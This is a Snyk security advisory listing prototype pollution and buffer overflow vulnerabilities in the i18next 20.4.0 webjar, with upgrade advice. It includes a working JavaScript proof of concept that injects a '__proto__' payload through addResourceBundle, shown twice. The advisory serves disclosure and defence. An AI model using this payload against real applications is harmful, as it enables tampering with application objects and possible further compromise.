org.webjars.npm:i18next 20.4.0 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.webjars.npm:i18next package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability	Vulnerable Version
H Prototype Pollution org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js). Affected versions of this package are vulnerable to Prototype Pollution via `getLastOfPath()` in `i18next.js`. How to fix Prototype Pollution? Upgrade `org.webjars.npm:i18next` to version 21.6.10 or higher.	[,21.6.10)
M Prototype Pollution org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js). Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the `AddResourceBundle` API which uses the the `deepExtend` function (`https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370`) internally to extend existing translations in a file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. PoC import i18n from "i18next"; i18n.init({ resources: { en: { namespace1: { key: 'hello from namespace 1' }, namespace2: { key: 'hello from namespace 2' } }, de: { namespace1: { key: 'hallo von namespace 1' }, namespace2: { key: 'hallo von namespace 2' } } } }); var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}'; i18n.init({ resources: {} }); i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload) ,true,true); console.log(i18n.options.resources); //a newly created empty object has the vulnerable property console.log({}.vulnerable); How to fix Prototype Pollution? Upgrade `org.webjars.npm:i18next` to version 21.6.10 or higher.	[,21.6.10)
M Buffer Overflow org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js). Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause buffer overflow by changing the translation to be recursive. How to fix Buffer Overflow? Upgrade `org.webjars.npm:i18next` to version 21.6.10 or higher.	[,21.6.10)

Vulnerability

Vulnerable Version

Prototype Pollution

org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Prototype Pollution via getLastOfPath() in i18next.js.

How to fix Prototype Pollution?

Upgrade org.webjars.npm:i18next to version 21.6.10 or higher.

[,21.6.10)

Prototype Pollution

org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the AddResourceBundle API which uses the the deepExtend function (https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370) internally to extend existing translations in a file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

PoC

import i18n from "i18next";
i18n.init({
    resources: {
      en: {
        namespace1: {
          key: 'hello from namespace 1'
        },
        namespace2: {
          key: 'hello from namespace 2'
        }
      },
      de: {
        namespace1: {
          key: 'hallo von namespace 1'
        },
        namespace2: {
          key: 'hallo von namespace 2'
        }  
      }
    }
  });

  var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
  i18n.init({ resources: {} });
  i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload)
  ,true,true);
 
 
console.log(i18n.options.resources);
//a newly created empty object has the vulnerable property
console.log({}.vulnerable);

How to fix Prototype Pollution?

Upgrade org.webjars.npm:i18next to version 21.6.10 or higher.

[,21.6.10)

Buffer Overflow

org.webjars.npm:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause buffer overflow by changing the translation to be recursive.

How to fix Buffer Overflow?

Upgrade org.webjars.npm:i18next to version 21.6.10 or higher.

[,21.6.10)

org.webjars.npm:i18next@20.4.0 vulnerabilities

latest version

latest non vulnerable version

first published

latest version published

licenses detected

package manager

Direct Vulnerabilities

How to fix?

PoC